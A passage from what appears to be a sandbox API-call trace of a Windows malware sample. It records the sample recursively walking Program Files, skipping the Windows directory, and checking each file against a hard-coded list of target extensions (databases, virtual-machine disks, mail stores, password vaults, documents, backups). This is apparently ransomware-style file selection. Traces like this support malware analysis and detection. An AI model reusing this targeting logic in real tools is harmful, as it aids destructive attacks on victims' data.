Files\\Microsoft Shared\\Stationery", pszFile="Tiki.gif" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" [0040.048] PathFindExtensionW (pszPath="Tiki.gif") returned=".gif" [0040.048] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".gif.") returned 5 [0040.048] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".gif.") returned 0x0 [0040.048] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.049] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="To_Do_List.emf" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" [0040.049] PathFindExtensionW (pszPath="To_Do_List.emf") returned=".emf" [0040.049] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".emf.") returned 5 [0040.049] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".emf.") returned 0x0 [0040.049] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.049] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="White_Chocolate.jpg" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" [0040.049] PathFindExtensionW (pszPath="White_Chocolate.jpg") returned=".jpg" [0040.049] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".jpg.") returned 5 [0040.049] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".jpg.") returned 0x0 [0040.049] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.049] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", pszFile="Wrinkled_Paper.gif" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" [0040.049] PathFindExtensionW (pszPath="Wrinkled_Paper.gif") returned=".gif" [0040.049] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".gif.") returned 5 [0040.049] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".gif.") returned 0x0 [0040.049] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.049] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.050] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.050] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="TextConv" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv" [0040.050] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned 0x0 [0040.050] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*" [0040.050] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.051] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.051] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.051] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US" [0040.051] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned 0x0 [0040.051] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*" [0040.051] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.051] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.051] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.051] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.052] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.052] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.052] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.052] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="Triedit" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit" [0040.052] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned 0x0 [0040.052] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*" [0040.052] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.053] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.053] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.053] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US" [0040.053] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned 0x0 [0040.054] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*" [0040.054] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.056] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.056] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.056] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.056] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.056] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.056] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.057] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="VC" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC" [0040.057] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\VC") returned 0x0 [0040.057] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\VC", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*" [0040.057] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.057] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.057] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.057] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\VC", pszFile="msdia100.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia100.dll" [0040.057] PathFindExtensionW (pszPath="msdia100.dll") returned=".dll" [0040.057] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.057] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.057] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.057] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\VC", pszFile="msdia90.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VC\\msdia90.dll" [0040.058] PathFindExtensionW (pszPath="msdia90.dll") returned=".dll" [0040.058] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.058] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.059] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.059] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="VGX" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX" [0040.059] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX") returned 0x0 [0040.059] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*" [0040.059] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.060] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", pszFile="VGX.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" [0040.060] PathFindExtensionW (pszPath="VGX.dll") returned=".dll" [0040.060] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.060] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.060] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.061] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.061] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0 [0040.061] FindClose (in: hFindFile=0x54ad20 | out: hFindFile=0x54ad20) returned 1 [0040.061] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.061] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="partnersrecreationalagelucia.exe" | out: pszDest="C:\\Program Files\\Common Files\\partnersrecreationalagelucia.exe") returned="C:\\Program Files\\Common Files\\partnersrecreationalagelucia.exe" [0040.061] PathFindExtensionW (pszPath="partnersrecreationalagelucia.exe") returned=".exe" [0040.061] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.061] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.061] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.061] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="rouge.exe" | out: pszDest="C:\\Program Files\\Common Files\\rouge.exe") returned="C:\\Program Files\\Common Files\\rouge.exe" [0040.061] PathFindExtensionW (pszPath="rouge.exe") returned=".exe" [0040.062] wsprintfW (in: param_1=0x2e4e4e8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.062] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.062] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.062] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="Services" | out: pszDest="C:\\Program Files\\Common Files\\Services") returned="C:\\Program Files\\Common Files\\Services" [0040.062] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Services") returned 0x0 [0040.062] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\Common Files\\Services", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Services\\*") returned="C:\\Program Files\\Common Files\\Services\\*" [0040.062] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0040.063] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.063] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.063] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Services", pszFile="verisign.bmp" | out: pszDest="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned="C:\\Program Files\\Common Files\\Services\\verisign.bmp" [0040.063] PathFindExtensionW (pszPath="verisign.bmp") returned=".bmp" [0040.063] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".bmp.") returned 5 [0040.063] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".bmp.") returned 0x0 [0040.063] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0 [0040.063] FindClose (in: hFindFile=0x54ad20 | out: hFindFile=0x54ad20) returned 1 [0040.063] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0040.063] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="SpeechEngines" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines") returned="C:\\Program Files\\Common Files\\SpeechEngines" [0040.063] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\SpeechEngines") returned 0x0 [0040.063] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\Common Files\\SpeechEngines", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\*") returned="C:\\Program Files\\Common Files\\SpeechEngines\\*" [0040.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0040.064] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.064] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.064] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\SpeechEngines", pszFile="Microsoft" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft" [0040.064] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 0x0 [0040.064] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*" [0040.064] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.067] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.067] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.067] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", pszFile="TTS20" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0040.067] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 0x0 [0040.067] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*" [0040.067] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.067] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.067] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.068] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0040.068] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 0x0 [0040.068] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*" [0040.068] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ae20 [0040.068] FindNextFileW (in: hFindFile=0x54ae20, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0040.068] FindNextFileW (in: hFindFile=0x54ae20, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0040.068] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", pszFile="enu-dsk" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0040.068] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 0x0 [0040.068] PathCombineW (in: pszDest=0x2e4b810, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*" [0040.068] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x2e4b3b8 | out: lpFindFileData=0x2e4b3b8) returned 0x54ae60 [0040.069] FindNextFileW (in: hFindFile=0x54ae60, lpFindFileData=0x2e4b3b8 | out: lpFindFileData=0x2e4b3b8) returned 1 [0040.069] FindNextFileW (in: hFindFile=0x54ae60, lpFindFileData=0x2e4b3b8 | out: lpFindFileData=0x2e4b3b8) returned 0 [0040.069] FindClose (in: hFindFile=0x54ae60 | out: hFindFile=0x54ae60) returned 1 [0040.069] FindNextFileW (in: hFindFile=0x54ae20, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0040.069] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", pszFile="MSTTSFrontendENU.dll" | out: pszDest="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned="C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" [0040.069] PathFindExtensionW (pszPath="MSTTSFrontendENU.dll") returned=".dll" [0040.069] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.069] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.069] FindNextFileW (in: hFindFile=0x54ae20, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 